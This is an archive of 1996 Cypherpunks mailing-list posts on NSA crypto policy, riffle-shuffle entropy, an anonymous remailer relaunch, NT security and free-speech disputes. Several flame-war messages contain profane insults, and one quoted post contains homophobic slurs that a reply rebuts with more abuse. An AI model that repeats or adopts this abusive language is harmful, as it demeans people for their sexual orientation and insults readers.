> I can understand people in other lands having some troubles with many
> English words, but one would've thought the constant stream of comments
> about the correct spelling of "subscribe" and "unsubscribe" would
> eventually get through. Or that people would learn to cut-and-paste from
> posted instructions.
> 
> Once again, instructions on unsubscribing are included below.
> 
> Alas, as usual, those most in need in need of such instructions are the
> least likely to ever read these messages.
> 
> --Tim
> 
> To subscribe to the Cypherpunks mailing list:
> 
> -send a message to: majordomo@toad.com
> 
> -body message of: subscribe cypherpunks
> 
> To unsubscribe from the Cypherpunks mailing list:
> 
> -send a message to: majordomo@toad.com
> 
> -body message of: unsubscribe cypherpunks
Read the instructions asshole!!!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: se7en <se7en@dis.org>
Date: Tue, 19 Nov 1996 18:08:54 -0800 (PST)
To: DC-Stuff List <dc-stuff@dis.org>
Subject: The NSA Responds
Message-ID: <Pine.BSI.3.91.961119180307.16430C-100000@kizmiaz.dis.org>
MIME-Version: 1.0
Content-Type: text/plain



The NSA responded to a series of 14 questions posed to them by the 
Houston Chronicle regarding their involvement and interest in cryptography.
While this article is not recent, it is still very interesting.

Because of the size, I have not posted it here. It can be found at:

http://www.dis.org/se7en/    and click the on "The NSA"

The question list is:

1. Has the NSA ever imposed or attempted to impose a weakness on any 
cryptographic code to see if it can thus be broken?

2. Has the NSA ever imposed or attempted to impose a weakness on the DES 
or DSS?

3. Is the NSA aware of any weaknesses in the DES or the DSS? The RSA?

4. Has the NSA ever taken advantage of any weaknesses in the DES or the
DSS?

5. Did the NSA play a role in designing the DSS? Why, in the NSA's 
analysis, was it seen as desirable to create the DSS when the apparently 
more robust RSA already stood as a de facto standard?

6. What national interests are served by limiting the power of 
cyptographic schemes used by the public?

7. What national interests are served by limiting the export of 
cryptographic technology?

8. What national interests are at risk, if any, if secure cryptography 
is widely available?

9. What does the NSA see as its legitimate interests in the area of 
cryptography?  Public cryptography?

10. How did NSA enter into negotiations with the Software Publishers 
Association regarding the export of products utilizing cryptographic 
techniques? How was this group chosen, and to what purpose? What statute 
or elected representative authorized the NSA to engage in the
discussions?

11. What is the status of these negotiations?

12. What is the status of export controls on products uing cryptographic 
techniques? How would you respond to those who point to the fact that 
the expot of RSA from the U.S. is controlled, but that its import into 
the U.S. is not?

13. What issues would you like to discuss that I have not addressed?

14. What question or questions would you like to pose of your critics?

se7en




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rcgraves@ix.netcom.com>
Date: Tue, 19 Nov 1996 18:21:49 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Reputation distortions?
In-Reply-To: <199611192300.RAA01464@smoke.suba.com>
Message-ID: <32926B04.7CAC@ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


snow wrote:
> 
> > I'm not saying that Gauss *didn't* discover the normal distribution. 
> > I'm saying that he didn't have to *prove* he did. Of course not. He 
> > was the greatest mathematician of his time, and probably since.
> > I'd call the event a reputation distortion.[...]
>      If Gauss had been called on it, what would have happened? If the 
> caller could _prove_ he was lying, what then? He still would have been 
> the greatist mathmatician of the time, but he would have been seen as 
> a liar and a crackpot. We know how that works don't we.

No.

I think the more common case is "the rich get richer, the poor get 
poorer." The truth is insufficent when honesty puts you at a 
disadvantage.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 19 Nov 1996 19:05:53 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Playing Cards - Caution!
In-Reply-To: <v02140b00aeb6e056bb78@[192.0.2.1]>
Message-ID: <56ts6f$2t9@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <EMgky8m9Lkmb085yn@netcom.com>,
Alan Bostick <abostick@netcom.com> wrote:
>Note: I haven't read Diaconis's work; just some reports of it in the news
>section of SCIENCE more than ten years ago, so people should take what
>I say with more than a grain of salt.
>
>
>Here is a (surely oversimplified) model of a less-than-perfect riffle
>shuffle:  the deck is divided into two equal stacks, and the shuffler
>typically introduces some number k of "errors" that result in a pair
>of adjacent cards in the shuffled deck being exchanged (compared to 
>a perfectly-shuffled deck).  In a fifty-two-card deck there are fifty-one
>possible pairs to exchange.  log2(51) = 5.67, so we get 5.67 bits of 
>entropy for each exchange, if the exchanges are distributed uniformly
>through the deck.

I studied the "imperfect shuffle" thing in my Randomized Algorithms class
last year.  If I remember correctly, an "imperfect shuffle" is something like
this:

Cut the deck into two piles, left and right.  The number of cards in
(say) the left pile is distributed binomially.

Drop one card at a time to form the new deck.  A card is dropped from the
left or right pile, with probability proportional to the number of cards
remaining in that pile.

   - Ian "someone else can figure out the entropy of this..."

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpJ0CkZRiTErSPb1AQHeJQP/c+LDI5dP1FWBb8TrArZYJ/LGTMsCnSIr
TWXEV1ZC7U30aKcXwYcoRh0COg3iSPpwwNCr8qveZz/F4t2nR9J1feu27NE2AqE/
M4CozehsGoX9jW4/zzZu+2M6YK2EhBlRu5JpsKUax7It0VBQCz34BccT+e/8CXMj
Ym+nS0zF7CM=
=s9HO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@AZStarNet.com
Date: Tue, 19 Nov 1996 18:13:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Dogpile
Message-ID: <199611200212.TAA20052@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


While Rome is burning, and with apologies in advance for the lack of vitriol
in this post, I would like to point out a new and effective means of
searching the Web and Usenet.

Check out Dogpile (with which I have no affiliation).





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Minow <minow@apple.com>
Date: Tue, 19 Nov 1996 19:58:59 -0800 (PST)
To: cypherpunks@toad.com
Subject: NYT article on Holocaust
Message-ID: <v03007802aeb830c8f401@[17.202.40.158]>
MIME-Version: 1.0
Content-Type: text/plain


An article in today's (Tue, Nov 19, 1996) New York Times described
how British intelligence had early information of the slaughter of
European Jewery through the decryption of German radio messages.
(Although not noted in the article, this is presumably Ultra
decryption of Enigma).

The information was not acted upon, and the article offers
a number of reasons, among which was a (not unreasonable) fear that
doing so would compromise Ultra. The article also notes that
the decryptions were kept so secret that the information was
not available at post-WW2 war crimes trials (such as Nurenburg).

I suppose that this could offer a counter argument to the NSA FUD
"If you only knew what we know."

Martin.
minow@apple.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ph@netcom.com (Peter Hendrickson)
Date: Tue, 19 Nov 1996 20:06:41 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Playing Cards - Caution!
Message-ID: <v02140b05aeb82f58b9c5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:59 PM 11/19/1996, Ian Goldberg wrote:
> I studied the "imperfect shuffle" thing in my Randomized Algorithms class
> last year.  If I remember correctly, an "imperfect shuffle" is something like
> this:

> Cut the deck into two piles, left and right.  The number of cards in
> (say) the left pile is distributed binomially.

> Drop one card at a time to form the new deck.  A card is dropped from the
> left or right pile, with probability proportional to the number of cards
> remaining in that pile.

>   - Ian "someone else can figure out the entropy of this..."

This is the approach described by Diaconis.  I think his book will
show you how to calculate the entropy, too.  (It's a cool book.
The same section shows how to do a magic trick using three riffle
shuffles.  A member of the audience inserts the mystery card in
the deck after the three riffle shuffles.  Then the magician
spreads the cards on the table and looks for one which does not
line up with one of the several interleaved sequences in the deck.)

However, it is not obvious to me that this is how it works every
time, for sure, guaranteed, no doubt at all, in the real world.
Diaconis mentions that the amount of entropy varies very substantially
by shuffler.  I also judged his experimental data to be limited.

Furthermore, I am suspicious of the model itself.  A binomial distribution
is convenient to use, but I don't think that's how people cut cards
in practice.  I think that it is a much more "pointy" distribution with
lower entropy.  When I cut the deck there are less than 4 bits of entropy.

But, I have to admit that if I worked my way through the book and
learned a little related math, I might be convinced.  But, even then
I would probably judge it to be too tenuous for security applications.

Incidentally, some big names have worked on this problem, like Graham
and Shannon.

Peter Hendrickson
ph@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joey Grasty" <jgrasty@gate.net>
Date: Tue, 19 Nov 1996 17:11:35 -0800 (PST)
To: remailer-operators@c2.org
Subject: WinSock Remailer Resuming Operation
Message-ID: <199611200111.UAA38820@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Y'all:

I'm pleased to announce that the WinSock Remailer is resuming
operation tonight at 11:00 PM EST from winsock@rigel.cyberpass.net.

All messages to the remailer must be PGP encrypted.  The public
key for this remailer is:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQBtAzKL9KEAAAEDANpSkWhtxPQXO4A/igS1TKsrHpBIgLd07sgKHmcwGsnPcI5K
h2/T1rm3E8lRw5zKWd5MDs7b9Ku7+/V1SjEs2XmpiX1aJ7oN2LJvQ9OO5Z01CwUA
7LFnSfcOrGCnk0ADrQAFEbQuV2luU29jayBSZW1haWxlciA8d2luc29ja0ByaWdl
bC5jeWJlcnBhc3MubmV0PokAdQMFEDKL9PjDgztlfPQWWQEBlYYC/iv5zt+v8E/N
puymUHLHavlBr9XuP7XVECW3trUxSRdCqnVp1el7fHIQNaN0hw+DW9KutOuumm+u
ZzwStZ94dimBYlmSedZ4t4f6DAOK0WZ6wosi/tV5IGlgCdIQA7o2W4kAdQMFEDKL
9M4OrGCnk0ADrQEBWCYDAIlhADaxwBSb2Edz9A5oqAq6YddIVSJdUwuIiN5TvKPa
oRXdpkpEYRi1JOUPNy+vLCF21c9LLUYcKMxMvIJPGq6OSBy6VzCdaiOS/yBz7fsH
9I4X5IwoNnf0/Mm+di5zlA==
=/UGi
- -----END PGP PUBLIC KEY BLOCK-----

Here's the info for the remailer-list:

$remailer{"winsock"} = "<winsock@rigel.cyberpass.net> cpunk pgp hash cut ksub reord";

I'll be adding "post" to this list after I get a more thorough 
testing of the NNTP code that I added for authentication.  "latent"
is also pending.

The remailer will run every 60 seconds from 12:00 AM to 8:00 AM
every day and whenever I am online.  Cyberpass automatically spools
the messages when I am not connected.

Those of you that want to run your own remailer may obtain a copy 
of the remailer from links from the WinSock Remailer Home Page
at:

  http://www.cyberpass.net/~winsock/

Currently, the remailer runs only under Windows 3.1, but a version
for Windows NT and 95 will be available shortly.

Note:  alt.religion.scientology and alt.clearing.technology are
blocked.  I'm not interested in run-ins with either supporters
or detractors of the Church of Scientology.  Binary and picture
groups are also blocked, but only because I don't have the 
bandwidth to support them.  I invite people who want remailers
to post to these groups to download the remailer and operate it
for themselves.

Regards,

Joey Grasty
Jim Ray
WinSock Remailer Operators


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpJaEQ6sYKeTQAOtAQEhZwMAqPnQG0a6Vm4HSx111ha1VulP7ClWqRba
66v/Ff5hLssO+nWbnEKb3VQ/sJEEdQzGQk2lMGeradxQBt0YANiymGkpNR66uAGg
a5rtisLAfmwJNJSGhvJtPaMd4r7HnSG3
=EN8y
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 19 Nov 1996 17:18:59 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611192041.MAA04325@kachina.jetcafe.org>
Message-ID: <Pine.SUN.3.94.961119201130.13259J-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Nov 1996, Dave Hayes wrote:

> Date: Tue, 19 Nov 1996 12:41:23 -0800
> From: Dave Hayes <dave@kachina.jetcafe.org>
> To: freedom-knights@jetcafe.org
> Cc: cypherpunks@toad.com
> Subject: Re: Does John Gilmore... 
> 
> Black Unicorn writes:
> > Dave Hayes writes:
> 
> > > > Again, you confuse free speech with free broadcast.
> > > Isn't broadcast a subset of speech, especially in this culture?
> > That which is broadcast is certainly speech.
> > Trying to draw some kind of "right to be broadcast" as a result is
> > stupidity or ignorance, or both.
> 
> Then I suppose you want to control all mailing lists, USENET groups,
> and web pages. These are broadcasts, and of course they have no rights
> other than what you seem to want to give them.

If I owned it, of course I would control it.  Many groups are moderated.
And no university is compelled to carry a group by any law or ethical
principal that I can think of.

You are simply exhibiting the symptoms of a spoiled brat because you have
been fortunate enough, thus far, to rely on the benevolance of whoever is
providing you your newsfeed.  The fact that control is not exercised, does
not mean it doesn't exist.  In reality control is exercised in many ways.

Thus your attempt to demonize me merely exposes your ire for the system as
it now exists, your fanciful dreams of how it should be aside.

> > Anyone has the right to, e.g., start a mailing list, or a newsletter.
> > No one has the right to compell ABC or FOX or John Gilmore or anyone
> > else to broadcast their speech.  (The rarest exceptions, like equal time
> > rules, exist in election contexts).
> 
> But what about this letter? It is cc'd to two mailing lists. I own the
> Freedom Knights one, John Gilmore owns the cyperpunks one. Does that
> mean that both of us have to approve it before it gets sent? Do we
> both own it?

Those bits which go to your list you clearly have the right to regulate.
Those that go to Mr. Gilmore's, likewise.

This is where you fail, with the basic inability to distinguish ownership
of intellectual content and the right to compell its broadcast by whomever
might control the medium.
 
> > Learn the difference.  Go to law school before you argue free speech
> > concepts in any detail.  
> 
> "Laws" do not cover the net's "multicast" technology.

>Snort<  I suppose you live in the only true anarchy?

> Distinguishing communication types so as to control those who use them
> is not going to solve your problem. You are much better off, from a
> practical standpoint, learning to control what you see and hear rather
> than attempting to control others. 

I'm not sure what the above babble means.  I'm not sure you are either.

> One does not need a school to see this, it sits under one's nose like
> a milk moustache.

This is the uneducated man's excuse.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Hayes <dave@kachina.jetcafe.org>
Date: Tue, 19 Nov 1996 20:28:33 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Does John Gilmore...
Message-ID: <199611200427.UAA06378@kachina.jetcafe.org>
MIME-Version: 1.0
Content-Type: text/plain


> On Tue, 19 Nov 1996, Dave Hayes wrote:
> > Black Unicorn writes:
> > > Dave Hayes writes:
> > > > > Again, you confuse free speech with free broadcast.
> > > > Isn't broadcast a subset of speech, especially in this culture?
> > > That which is broadcast is certainly speech.
> > > Trying to draw some kind of "right to be broadcast" as a result is
> > > stupidity or ignorance, or both.
> > Then I suppose you want to control all mailing lists, USENET groups,
> > and web pages. These are broadcasts, and of course they have no rights
> > other than what you seem to want to give them.
> If I owned it, of course I would control it.  

If you really owned it, you would not need to control it. 

> You are simply exhibiting the symptoms of a spoiled brat because you have
> been fortunate enough, thus far, to rely on the benevolance of whoever is
> providing you your newsfeed.  

Methinks you know not to whom you are speaking to. Those that know may
see just how the seeds of assumptions are sown in this person's mindset.

> The fact that control is not exercised, does not mean it doesn't
> exist.  In reality control is exercised in many ways.

The fact that control exists does not mean it is effective, necessary,
or appropriate. Unchecked need to control is merely an outward sign of
a lack of inner control, which is a disease most control freaks have. 

> Thus your attempt to demonize me merely exposes your ire for the system as
> it now exists, your fanciful dreams of how it should be aside.

I am not attempting to demonize you...you do that to yourself well
enough. I have no interest in your support or opposition, other than
as a tool to show those who can see where certain specific attitudes
come from.

> This is where you fail, with the basic inability to distinguish ownership
> of intellectual content and the right to compell its broadcast by whomever
> might control the medium.

I maintain that it is neither appropriate nor in any sense beneficial
to apply this kind of draconian control to internet communication in
the general sense.

> > > Learn the difference.  Go to law school before you argue free speech
> > > concepts in any detail.  
> > "Laws" do not cover the net's "multicast" technology.
> >Snort<  I suppose you live in the only true anarchy?

Why is it that when less regulation is desirable, the kneejerk
response is to declare that desire anarchistic? 

Human attempts at creating and imposing "law" are arbitrary,
inefficient, and subject to change based on the whim of those 
who claim to own their implementation.

> > Distinguishing communication types so as to control those who use them
> > is not going to solve your problem. You are much better off, from a
> > practical standpoint, learning to control what you see and hear rather
> > than attempting to control others. 
> I'm not sure what the above babble means.  

Hence your attempt to control others.

> I'm not sure you are either.

Hence your inability to understand the concept of "honor".

> > One does not need a school to see this, it sits under one's nose like
> > a milk moustache.
> This is the uneducated man's excuse.

"Education" has very little to do with knowledge and a lot more to do
with external approval, in the sense you appear to be using it.
"Indoctrination" and "Conditioning" are the two terms that best fit
your apparent notion. 

We all know how far those have gotten us in the past 2000 years.
One can see this "progress" by looking at the net's attempts to control
Mr. Grubor...
------
Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet

A king who feared wasps once decreed that they would be abolished.

As it happened, they did him no harm. But he was eventually stung to death
by scorpions. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 20 Nov 1996 07:14:04 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: Fuck You Dumb Cunt
Message-ID: <848501965.1021146.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



 
>   I believe the posession of property is a priv. to be taken 
> away if abused.  There is no such thing as a 'right' to 
> property--in fact the very notion seems absurd.

In what sense do you believe I am given a "privelige" to own what I 
do.

Your very attitude implies some form of statism, in that you believe 
some higher authority has the right to remove that which I lawfully 
accumulated, this is the position taken by those who support the idea 
of taxation etc.

Explain further, if you will, what you mean by this being a 
privelige. In what cases do you believe I do not have the right to 
retain my property?



 
 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 20 Nov 1996 07:00:42 -0800 (PST)
To: aga <aga@dhp.com>
Subject: Re: Aga the homophobic redneck son of a bitch
Message-ID: <848501939.1021040.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



> Hey motherfucker, I TOLD YOU to leave out the stupid
> cypherpunks header!  Just when are you going to learn
> to listen?!!  You have been around those faggots too much!

Listen you cheap ass redneck son of a bitch, your homophobic biggoted 
attitudes do not impress anyone here.

> Faggots have NOTHING to do with Fredom of Speech!

Homosexual people have everything to do with liberty and basic 
freedom, learn how to read and maybe you`d be able to learn something 
about the subject. 

> There is a basic understanding in life by ALL GOOD MEN
> that Faggots are defective creatures.  NOBODY wants to
> be seen with or associated with faggots!

I`m afraid not actually fool. I am not a homosexual myself but 
whatever other peoples sexual orientation it has nothing to do with 
their worth or value in other areas.
 
> John Gilmore is a Faggot, therefore he is defective.
> And we question any of his associates.
> open and shut case.

I think not, I do not think I count myself among John`s "associates" 
and we no doubt disagree on a number of issues but you may ask 
whatever questions about me you choose to. You are the one who needs 
questioning, preferably by a good psychiatrist and failing that a 
night club bouncer with a baseball bat...

Decist and leave, you are hereby killfiled.


 

  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@fatmans.demon.co.uk
Date: Wed, 20 Nov 1996 07:09:04 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: Fuck You Dumb Cunt
Message-ID: <848501960.1021126.0@fatmans.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


 
>   That's a fair question.  I don't begrude one's ownership of their
> fair share--but I do have serious problems with what we shall
> call 'accumulators' if you will.  For them I have contempt and no--
> they do not have that right of possession and often such 'work' is
> at the expense and on the backs of others.

Oh my god, a COMMUNIST!!!! - Call the morality police someone, 
quick. ;-)



  Datacomms Technologies web authoring and data security
       Paul Bradley, Paul@fatmans.demon.co.uk
  Paul@crypto.uk.eu.org, Paul@cryptography.uk.eu.org    
       Http://www.cryptography.home.ml.org/
      Email for PGP public key, ID: 5BBFAEB1
     "Don`t forget to mount a scratch monkey"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ! Drive <drink@aa.net>
Date: Tue, 19 Nov 1996 21:09:40 -0800 (PST)
To: (Recipient list suppressed)
Subject: Symantec ask user to post registry(passwords and all) in newsgroup
Message-ID: <3.0.32.19691231160000.006923d8@aa.net>
MIME-Version: 1.0
Content-Type: text/enriched

Path: usenet73.supernews.com!news.good.net!news.good.net!www.nntp.primenet.com!nntp.primenet.com!mr.net!news.clark.net!phzzzt!service.symantec.com!usenet
From: "Nancy Ives [Symantec]" <nives@symantec.com>
Newsgroups: symantec.support.win95.nortonutilities.general
Subject: Re: Crashing while searching with Reg Editor - continued (For Nancy Ives/Symantec).
Date: 20 Nov 1996 00:06:09 GMT
Organization: Support Request
Lines: 40
Message-ID: <01bbd675$eb9440e0$7357409b@nanio.symantec.com>
References: <01bbd1a6$ea377560$9e2774cf@HALLM999.JH.COM>
NNTP-Posting-Host: 155.64.87.115
X-Newsreader: Microsoft Internet News 4.70.1155


Thanks for the input.  Could you send me a copy of your Registry?  Export
the whole thing and attach it to a post.  Thanks!
-- 
Nancy Ives
Symantec Product Support




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Tue, 19 Nov 1996 21:20:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Lucky your no punk...
In-Reply-To: <199611192226.OAA19091@mailmasher.com>
Message-ID: <199611200514.VAA05121@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


> From: cyberhawk <cyberhawk@mailmasher.com>
>
> Lucky:
> 
> Are you an elitist cypherpunk? It sounds like you've out grown the designation
> of punk.
> 
> Punk:   1. worthless or unimportant person. 2. a petty hoodlum -adj, 3. poor
> in quality.

Umm, 4. (English slang, vulgar) Someone who is homosexual.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Nov 1996 19:30:27 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Invitation to PhD defense
In-Reply-To: <56qnou$5va@sdcc12.ucsd.edu>
Message-ID: <2a9NXD28w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: perun!news2.panix.com!panix!newsfeed.internetmci.com!news.sprintlink.net!news-peer.sprintlink.net!howland.erols.net!swrinde!ihnp4.ucsd.edu!sdcc12.ucsd.edu!cs!markus
From: markus@cs.ucsd.edu (Markus Jakobsson)
Newsgroups: sci.crypt
Subject: Invitation to PhD defense
Message-ID: <56qnou$5va@sdcc12.ucsd.edu>
Date: 18 Nov 1996 22:25:34 GMT
Organization: CSE Dept., U.C. San Diego
Lines: 12
NNTP-Posting-Host: beowulf.ucsd.edu

On December 9th, I will defend my thesis, ``Privacy vs. Authenticity'',
proposing an efficient and versatile payment system that balances
privacy requirements against protection against criminals. 
If you are in San Diego at this time, I would like to invite you to
the defense. For more details, please contact me by email.

Markus Jakobsson

-- 
Research: privacy vs. authenticity, digital cash, zero-knowledge.
Homepage: http://www-cse.ucsd.edu/users/markus/
Email   : markus@cs.ucsd.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Tue, 19 Nov 1996 19:14:33 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Rogue Governments Issuing Policy Tokens
Message-ID: <199611200314.WAA35686@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Wed Nov 20 22:12:52 1996
Hal wrote:

<snip>

> I can't see the U.S. allowing Libya and similar countries to create
>  policy
> tokens.  The whole point of this exercise is to prevent these countries
> from being able to use strong crypto.  So they will certainly not be on
> the approved list.

I think Tim was referring to a "Panama" or "'80s Iraq" situation, rather 
than a stable enemy state like Libya. Unless the hardware has some way of 
making itself have a short lifetime, there will be problems when U.S. policy 
changes or when one is stolen.

<snip>

> Companies which try to sell computers with these
>  chips
> in them risk getting a "big brother inside" (to use Tim's very effective
> slogan) reputation.  I think this initiative is going nowhere.

Amen. Sometimes these policy initiatives seem so ham-handed that the 
suspicious side of me wonders "what they're really up to." They can't 
seriously think they can control this any more than they can control the 
ocean, at least not without an awesome (even for this century) world-wide 
police-state.
JMR

P.S. Please, everyone, try not to feed the flamefest-knights, so they will 
someday (hopefully) go away. Creative killfiling can only do so much.


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMpPItzUhsGSn1j2pAQF19QfQhGqLa5BBoxcPdX+FGyY6zCQY5jOQA5y5
HJjB28jQGGmqiNFpXsqh2UB+aRMCYknWmshG3kBOsPqpQBiIRaHpUalYTsDxdnIA
bd8rwHvY8uD6aCKdaU1yAE+fXbdLuwClUYL9SbeoLo/84ITRKWNX8LuBCPF5fROS
soRrsx1noLW4V9rFvhYRmFXp7czmHGAl2ItOcndNv1xBLFea8BJ3VdbrNWgTO4rc
Q2glxaqMYqd1gF3Q2uFz2u5NLlh0Ba+1MZCF9MJQ1yXdL4N0Ucov5pAeiBWCg8Ef
h0BkekE6oiE9OUeu3YUZjVb0V4CcUeejUIYPxj/a97RiiA==
=mNwN
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 19 Nov 1996 20:00:26 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 1996 Codebreakers
In-Reply-To: <199611200032.TAA23642@homeport.org>
Message-ID: <k50NXD29w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@homeport.org> writes:
> 	I just got a review copy of the new (1996) ed. of Kahn's The
> Codebreakers from my local used bookstore.  Its a little disapointing,
...
> & DH.  Nothing on Cypherpunks, little on how privacy can be enhanced.

Some folks have a very unrealistic opinion of their own importance.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "lyalc@mail.cba.com.au" <lyalc@cba.com.au>
Date: Wed, 20 Nov 1996 13:17:08 -0800 (PST)
To: Justin Robbins <jmr@rmisp.com>
Subject: Re: NT insecurity
In-Reply-To: <3.0.32.19961118194954.00964d10@rmisp.com>
Message-ID: <32919A95.159E@mail.cba.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Justin Robbins wrote:
> 
> Well, for those uninformed out there who believe that you can
> penetrate an NT box using NTFSDOS, the problem remains that security
> in windows NT is a combination between the filesystem NTFS and the
> actual operating system, NT. NTFSDOS only allows reading the drives,
> not writing to them. NT also keeps the security registry

I guess Norton Utilities for DOS don't work if you have NTFSDOS loaded,
then.

Lyal






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 19 Nov 1996 21:16:14 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Reputation based hiring (was REQUESTING INFORMATION)
In-Reply-To: <199611200231.AAA16348@prometheus.hol.gr>
Message-ID: <199611200507.XAA06809@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


George A. Stathis wrote:
> I would never hire you. What I need is people with a VISION;
> NOT people with IMPAIRED VISION, distorting things so unreliably.
> 
> I need TRUE VISIONARIES able to work creatively in High Technology.
> People like Philip Kahn (Hurrah) and Richard Branson (Hurrah, Bravo);
> even Bill Gates himself, were SELF-MADE visionaries.
> 
> In contrast... people "threatening others with unemployability files",
> are CLAY MEDIOCRITIES.

You do not want "visionaries" who will steal your files and ruin your
business. There are many persons who are very smart and creative, and
yet one can expect to have a net loss from hiring them. Intelligence and
any other factor cannot be the sole determinants of employments.

Reputations are very important economically: since everyone knows that
their reputations, and not only current contracts, are on the line, they
avoid incurring losses to their employers for a short-term illicit gain.
That prevents a lot of theft, for example, among other things.

Also, employers have their own gain by discriminating between employees
with an expected loss and employees with expected profit. Employees,
likewise, can gain by having good references from previous employers.

If you, in your "pro-freedom" rage, somehow manage to make employers to
ignore reputations when they make hiring decisions, you will immediately
create incentives for an economically damaging behavior. As a result, 
there would be a net loss in the economy. People will also trust others
less because cheating will not be punished as seriously as it is now.
Lack of trust would force them to waste more money on lawyers.

George, if you calmed down a little bit, you would have thought about
the following: just as people have the right to speak on, say,
cypherpunks mailing list, people have exactly the same right to speak on
"hiring-punks" discussion list. There is not a whole lot of difference.
Limitations to one right (like rules by list owners) are exactly
the same. It is illogical to defend one right and to deny another.

Another issue is, whom should we trust in their "DON'T HIRE ..." 
recommendations? You could insist, for example, that a certain list
made by a certain person should be ignored because that person was
not fit to make hiring recommendations. I do not view such activity
as economically damaging. 

If you, however, fought with the very notion of "unemployability
lists", you would in fact create an economic loss. Of course you are
still free to speak against these lists, but your position is not
sound.

